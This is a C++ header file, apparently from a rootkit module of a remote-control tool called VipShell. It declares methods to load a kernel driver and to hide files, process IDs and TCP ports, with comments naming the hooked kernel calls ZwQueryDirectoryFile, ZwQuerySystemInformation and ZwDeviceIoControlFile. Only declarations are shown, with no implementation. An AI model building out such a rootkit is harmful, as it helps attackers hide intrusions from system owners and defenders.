www.pudn.com > VipShell-rootkit-module.rar > RootKitModule.h

#pragma once 
#include  
#include "../I_RootKitModule.h" 
 
 
 
class CRootKitModule : 
	public CPinboard 
{ 
	COMPONENT_INSTANCE_PINBOARD(CRootKitModule) 
public: 
	virtual void Test() ; 
public: 
	//实现接口.. 
	virtual bool CreateDriver(LPCSTR szFileName, LPCSTR szDriver);  
	virtual bool StartDriver() ;  
	virtual bool StopDriver();   
	virtual bool DeleteDriver(LPCTSTR szDriver = NULL); 
 
	virtual bool AddHideFile(LPCTSTR szFile);  //添加一个隐藏文件  最多10 个 
	virtual bool DelHideFile(LPCTSTR szFile);  //取消隐藏一个文件 
	virtual bool StartHideFile();              //开始HOOK ZwQueryDirectoryFile 
 
	virtual bool AddHideProcessId(DWORD dwId);        //添加 隐藏一个进程 最多10 个 
	virtual bool DelHideProcessId(DWORD dwId);        //取消隐藏一个进程 
	virtual bool StartHideProcess();                     //开始HOOK ZwQuerySystemInformation 
 
	virtual bool AddHidePort(DWORD dwPort);             //隐藏一个 本地TCP端口 最多10 个 
	virtual bool DelHidePort(DWORD dwPort); //delete 
	virtual bool StartHidePort();                  //HOOK ZwDeviceIoControlFile 
protected: 
	BOOL StopService(SC_HANDLE hSCManager, LPCTSTR ServiceName); 
	BOOL StartService(SC_HANDLE hSCManager, LPCTSTR ServiceName); 
	BOOL InstallService(SC_HANDLE hSCManager, LPCTSTR ServiceName, LPCTSTR ServiceExe); 
	BOOL RemoveService(SC_HANDLE hSCManager, LPCTSTR ServiceName); 
 
	HANDLE _CreateFile(); 
protected: 
	SC_HANDLE m_hSCManager; 
	std::wstring m_strDriverName; 
};